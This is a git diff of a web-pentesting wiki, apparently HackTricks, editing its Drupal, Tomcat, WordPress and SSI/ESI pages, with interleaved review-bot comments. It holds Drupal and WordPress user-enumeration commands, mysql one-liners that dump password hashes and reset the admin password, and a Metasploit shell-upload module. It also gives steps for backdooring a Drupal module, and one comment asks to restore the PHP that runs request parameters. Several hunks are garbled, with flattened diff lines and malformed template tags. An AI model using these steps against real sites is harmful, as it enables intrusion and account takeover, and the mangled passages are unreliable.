diff --git a/network-services-pentesting/pentesting-web/README.md b/network-services-pentesting/pentesting-web/README.md index f8ab8910f6a..4ed3520ebc0 100644 --- a/network-services-pentesting/pentesting-web/README.md +++ b/network-services-pentesting/pentesting-web/README.md @@ -115,7 +115,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno * [**Python**](python.md) * [**Spring Actuators**](spring-actuators.md) * [**Symphony**](symphony.md) -* [**Tomcat**](tomcat.md) +* [**Tomcat**](tomcat/) * [**VMWare**](vmware-esx-vcenter....md) * [**Web API Pentesting**](web-api-pentesting.md) * [**WebDav**](put-method-webdav.md) @@ -161,7 +161,7 @@ node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi If a CMS is used don't forget to **run a scanner**, maybe something juicy is found: -[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat.md)**, Railo, Axis2, Glassfish**\ +[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/)**, Railo, Axis2, Glassfish**\ [**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/), **Joomla**, **vBulletin** websites for Security issues. (GUI)\ [**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/)**, PrestaShop, Opencart**\ **CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/) **or** [**(M)oodle**](moodle.md)\ diff --git a/network-services-pentesting/pentesting-web/drupal/README.md b/network-services-pentesting/pentesting-web/drupal/README.md index a36a0b85c47..a78ec7b3b4c 100644 --- a/network-services-pentesting/pentesting-web/drupal/README.md +++ b/network-services-pentesting/pentesting-web/drupal/README.md @@ -9,7 +9,7 @@ Learn & practice GCP Hacking: 
 <summary>Support HackTricks</summary>
 
 * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
 * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
@@ -35,12 +35,6 @@ curl drupal-site.com/node/1
 
 ## Enumeration
 
-Drupal supports **three types of users** by default:
-
-1. **`Administrator`**: This user has complete control over the Drupal website.
-2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
-3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
-
 ### Version
 
 * Check `/CHANGELOG.txt`
@@ -57,36 +51,23 @@ Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `REA
 
 ### Username enumeration
 
-#### Register
-
-In _/user/register_ just try to create a username and if the name is already taken it will be notified:
-
-![](<../../../.gitbook/assets/image (328).png>)
-
-#### Request new password
-
-If you request a new password for an existing username:
-
-![](<../../../.gitbook/assets/image (903).png>)
-
-If you request a new password for a non-existent username:
-
-![](<../../../.gitbook/assets/image (307).png>)
-
-### Get number of users
+Drupal supports **three types of users** by default:
 
-Accessing _/user/\<number>_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
+1. **`Administrator`**: This user has complete control over the Drupal website.
+2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
+3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
 
-![](<../../../.gitbook/assets/image (333).png>)
+**To enumerate users you can:**
 
-![](<../../../.gitbook/assets/image (227) (1) (1) (1).png>)
+* **Get number of users:** Just access `/user/1`, `/user/2`, `/user/3`... until it returns an error indicating that the suer doesn't exist.
+* **Registry**: Access`/user/register` and try to create a username and if the name is already taken it will be indicated in an error from the server.
+* **Reset password**: Try to reset the password of a user and if the user doesn't exist it will be indicated clearly in an error message.
 
 ### Hidden pages
 
-**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
-You could find **hidden pages** (test, dev) which are not referenced by the search engines.
+Just find new pages by looking into **`/node/FUZZ`** where **`FUZZ`** is a number (from 1 to 1000 for example).
 
-#### Installed modules info
+### Installed modules info
 
 ```bash
 #From https://twitter.com/intigriti/status/1439192489093644292/photo/1
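Review bot: the `Get number of users` bullet in this hunk tells the reader to walk `/user/1`, `/user/2`... "until it returns an error", but Drupal user IDs are not contiguous (deleted accounts leave gaps) so stopping at the first miss undercounts, and the useful signal is the status code rather than "an error": an anonymous request for an existing account's `/user/N` is typically answered with 403 while a non-existent one gets 404. Suggest iterating a fixed range and recording the 403s, e.g. `for i in $(seq 1 200); do curl -s -o /dev/null -w "%{http_code} /user/$i\n" http://drupal-site.local/user/$i; done`. Same hunk: `suer` -> `user`, `Registry` -> `Register` (the endpoint `/user/register` is the registration form), a missing space in ``Access`/user/register` ``, and the `/node/FUZZ` rewrite drops the one clause that explained why fuzzing node IDs pays off (unlinked test/dev pages that search engines never indexed); keep that. Finally, the relocated Administrator / Authenticated User / Anonymous list describes roles, not usernames, so it sits oddly under `### Username enumeration`; its previous place as the intro to `## Enumeration` fit better.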
@@ -98,7 +79,7 @@ curl https://example.com/core/core.services.yml
 curl https://example.com/config/sync/swiftmailer.transport.yml
 ```
 
-### Automatic
+## Automatic Tools
 
 ```bash
 droopescan scan drupal -u http://drupal-site.local
@@ -122,19 +103,19 @@ If you have access to the Drupal web console check these options to get RCE:
 
 ### Read settings.php
 
-```
+{% code overflow=/dev/null ``` +{% endcode %} ### Dump users from DB -``` +{% code overflow="wrap" %} +```bash mysql -u drupaluser --password='2r9u8hu23t532erew' -e 'use drupal; select * from users' ``` - -## References - -* [https://academy.hackthebox.com/module/113/section/1209](https://academy.hackthebox.com/module/113/section/1209) +{% endcode %}
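Review bot: as rendered in this hunk the new opener for the `Read settings.php` block is `{% code overflow=/dev/null` with a bare ``` fence after it, whereas the `Dump users from DB` block below gets the well-formed `{% code overflow="wrap" %}` plus a ```bash fence; if that is what landed in the file the first GitBook code tag is malformed and the block will not render, so make both openers identical. This hunk also deletes the whole `## References` section, including the HTB Academy link that credited the walkthrough these two blocks come from; if the link has to go, keep some attribution or a replacement source rather than dropping the section outright. Minor: the sample `mysql -u drupaluser --password='2r9u8hu23t532erew'` passes the password on the command line, which lands in shell history and `ps` output; a short comment recommending `-p` with an interactive prompt would help readers who copy it against a real target.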
@@ -149,7 +130,7 @@ Learn & practice GCP Hacking: 
 <summary>Support HackTricks</summary>
 
 * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
 * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
diff --git a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
index 10c1bfd92ae..e645355d828 100644
--- a/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
+++ b/network-services-pentesting/pentesting-web/drupal/drupal-rce.md
@@ -40,13 +40,13 @@ curl http://drupal-site.local/node/3
 ## Install PHP Filter Module
 
 {% hint style= **`Reports`** > **`Available updates`**. 3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**. 4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**. @@ -57,24 +57,7 @@ From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/ In current versions it's no longer possible to install plugins by only having access to the web after the default installation. {% endhint %} -A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz). - -* Download the archive and extract its contents. - -``` -wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz -tar xvf captcha-8.x-1.2.tar.gz -``` - -* Create a **PHP web shell** with the contents: - -```php - -``` - -* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder. +It was possible to **download** a **module**, add a **backdoor** to it and **install** it. For example, downloading [**Trurnstile**](https://www.drupal.org/project/turnstile) module in compressed format, creating a new PHP backdoor file inside of it, allowing the accessing of the PHP file with a `.htaccess` file: ```html 
@@ -83,15 +66,7 @@ RewriteBase / ``` -* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive. - -```bash -mv shell.php .htaccess captcha -tar cvf captcha.tar.gz captcha/ -``` - -* Assuming we have **administrative access** to the website, click on **`Manage`** and then **`Extend`** on the sidebar. Next, click on the **`+ Install new module`** button, and we will be taken to the install page, such as `http://drupal-site.local/admin/modules/install` Browse to the backdoored Captcha archive and click **`Install`**. -* Once the installation succeeds, browse to **`/modules/captcha/shell.php`** to execute commands. +And then going to **`http://drupal.local/admin/modules/install`** to install the backdoored module and access **`/modules/turnstile/back.php`** to execute it. ## Backdooring Drupal with Configuration synchronization diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat/README.md similarity index 89% rename from network-services-pentesting/pentesting-web/tomcat.md rename to network-services-pentesting/pentesting-web/tomcat/README.md index 4806c198cb7..7bf01a0184c 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -1,8 +1,8 @@ # Tomcat {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
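Review bot: the rewritten backdoored-module paragraph in `drupal-rce.md` spells the module `Trurnstile` while the link points at `drupal.org/project/turnstile` (Turnstile), and it installs from `http://drupal.local/admin/modules/install` while the rest of the page uses `drupal-site.local` (see `curl http://drupal-site.local/node/3` in the hunk context); pick one host name. More importantly, the condensed version removes the `wget`/`tar` steps, the PHP shell contents and the `mv shell.php .htaccess captcha` / re-archive step, so the reader is now told to add `back.php` and an `.htaccess` to the module without being shown what either contains or that both must be placed inside the module directory before it is re-packed and uploaded; a one-line sketch of each (the rewrite rule that lifts the `/modules` access denial, and the PHP that executes a request parameter) keeps the procedure reproducible. The hint block kept above it is still consistent with the past tense `It was possible`, so no change needed there.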
@@ -20,7 +20,7 @@ Learn & practice GCP Hacking:
+
## Enumeration @@ -128,7 +128,7 @@ Finally, if you have access to the Tomcat Web Application Manager, you can **upl ### Limitations -You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](tomcat.md#post)section). +You will only be able to deploy a WAR if you have **enough privileges** (roles: **admin**, **manager** and **manager-script**). Those details can be find under _tomcat-users.xml_ usually defined in `/usr/share/tomcat9/etc/tomcat-users.xml` (it vary between versions) (see [POST ](./#post)section). ```bash # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed @@ -277,8 +277,8 @@ Example: * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
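Review bot: the updated `Limitations` line keeps the claim that deploying a WAR needs the roles `admin`, `manager` and `manager-script`, which does not match Tomcat's role names from Tomcat 7 onward: the HTML manager (`/manager/html`) requires `manager-gui`, the text interface that `curl` and scripts use (`/manager/text`) requires `manager-script`, and `admin-gui` / `admin-script` belong to the host-manager application, so a stock `tomcat-users.xml` has no plain `admin` or `manager` role. Since the line is already being touched to repoint `tomcat.md#post` at `./#post` after the rename to `tomcat/README.md`, fix the role list and the grammar in the same edit (`Those details can be found under`, `it varies between versions`). The rename is consistent with the `SUMMARY.md` change at the top of the patch.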
diff --git a/network-services-pentesting/pentesting-web/wordpress.md b/network-services-pentesting/pentesting-web/wordpress.md index d7966aacce8..4a54e5b48bd 100644 --- a/network-services-pentesting/pentesting-web/wordpress.md +++ b/network-services-pentesting/pentesting-web/wordpress.md @@ -9,7 +9,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -18,20 +18,21 @@ Learn & practice GCP Hacking:
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} ## Basic Information -**Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\ -**Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\ -**Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) +* **Uploaded** files go to: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt` +* **Themes files can be found in /wp-content/themes/,** so if you change some php of the theme to get RCE you probably will use that path. For example: Using **theme twentytwelve** you can **access** the **404.php** file in: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -In **wp-config.php** you can find the root password of the database. + * **Another useful url could be:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php) -Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ + +* In **wp-config.php** you can find the root password of the database. 
+* Default login paths to check: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_ ### **Main WordPress Files** @@ -115,7 +116,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} @@ -128,27 +129,23 @@ You probably won't be able to find all the Plugins and Themes passible. In order ### Users -**ID Brute** - -You get valid users from a WordPress site by Brute Forcing users IDs: +* **ID Brute:** You get valid users from a WordPress site by Brute Forcing users IDs: -``` +```bash curl -s -I -X GET http://blog.example.com/?author=1 ``` If the responses are **200** or **30X**, that means that the id is **valid**. If the the response is **400**, then the id is **invalid**. -**wp-json** - -You can also try to get information about the users by querying: +* **wp-json:** You can also try to get information about the users by querying: -``` +```bash curl http://blog.example.com/wp-json/wp/v2/users ``` Another `/wp-json/` endpoint that can reveal some information about users is: -``` +```bash curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL ``` @@ -156,9 +153,7 @@ Note that this endpoint only exposes users that have made a post. **Only informa Also note that **/wp-json/wp/v2/pages** could leak IP addresses. -#### Login username enumeration - -When login in **`/wp-login.php`** the **message** is **different** is the indicated **username exists or not**. +* **Login username enumeration**: When login in **`/wp-login.php`** the **message** is **different** is the indicated **username exists or not**. ### XML-RPC 
@@ -252,7 +247,7 @@ This can be used to ask **thousands** of Wordpress **sites** to **access** one * ``` -![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png) +![](../../.gitbook/assets/1_JaUYIZF8ZjDGGB7ocsZC-g.png) If you get **faultCode** with a value **greater** then **0** (17), it means the port is open. @@ -288,13 +283,13 @@ This is the response when it doesn't work: ![](<../../.gitbook/assets/image (365).png>) -### SSRF +## SSRF {% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %} This tool checks if the **methodName: pingback.ping** and for the path **/wp-json/oembed/1.0/proxy** and if exists, it tries to exploit them. -### Automatic Tools +## Automatic Tools ```bash cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0" @@ -302,14 +297,6 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec #You can try to bruteforce the admin user using wpscan with "-U admin" ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} - ## Get access by overwriting a bit More than a real attack this is a curiosity. IN the CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) you could flip 1 bit from any wordpress file. So you could flip the position `5389` of the file `/var/www/html/wp-includes/user.php` to NOP the NOT (`!`) operation. @@ -335,7 +322,7 @@ Search in internet how can you access that updated page. In this case you have t You can use: -``` +```bash use exploit/unix/webapp/wp_admin_shell_upload ``` @@ -401,15 +388,19 @@ The content includes visual aids depicting the steps in the WordPress dashboard Extract usernames and passwords: +{% code overflow="wrap" %} ```bash mysql -u --password= -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;" ``` +{% endcode %} Change admin password: +{% code overflow="wrap" %} ```bash mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;" ``` +{% endcode %} ## Wordpress Plugins Pentest @@ -489,7 +480,7 @@ Also, **only install trustable WordPress plugins and themes**.
\ -Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_term=trickest\&utm\_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ +Use [**Trickest**](https://trickest.com/?utm_source=hacktricks\&utm_medium=text\&utm_campaign=ppc\&utm_term=trickest\&utm_content=wordpress) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %} @@ -503,7 +494,7 @@ Learn & practice GCP Hacking: Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
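Review bot: two of the re-flowed `Basic Information` bullets carry claims worth fixing while the lines are being rewritten: `wp-config.php` holds the credentials of the database user the site connects with (`DB_USER` / `DB_PASSWORD`), which is the root password only if the installer chose to run the site as root, so `the root password of the database` overstates it; and the nested bullet whose text reads `/wp-content/themes/default/404.php` still links to `.../themes/twentytwelve/404.php`, so link text and target disagree. The nested bullet also ends up indented under the theme bullet with a blank line before the next item, which splits the list on render; keeping it flat is simpler. In the `### Users` hunk further down the unchanged context says a `400` response to `?author=N` marks an invalid id, but a missing author normally yields a `404`; since the surrounding lines are being reformatted anyway, correct that in the same pass.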
diff --git a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md index 18e70aa89c4..d94f7ec3acb 100644 --- a/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md +++ b/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md @@ -1,15 +1,15 @@ # Server Side Inclusion/Edge Side Inclusion Injection {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
@@ -17,7 +17,7 @@ Learn & practice GCP Hacking: @@ -251,7 +254,6 @@ Check the XSLT page: * [https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) * [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/) -* [https://academy.hackthebox.com/module/145/section/1304](https://academy.hackthebox.com/module/145/section/1304) * [https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91](https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91) ## Brute-Force Detection List @@ -259,15 +261,15 @@ Check the XSLT page: {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %} {% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.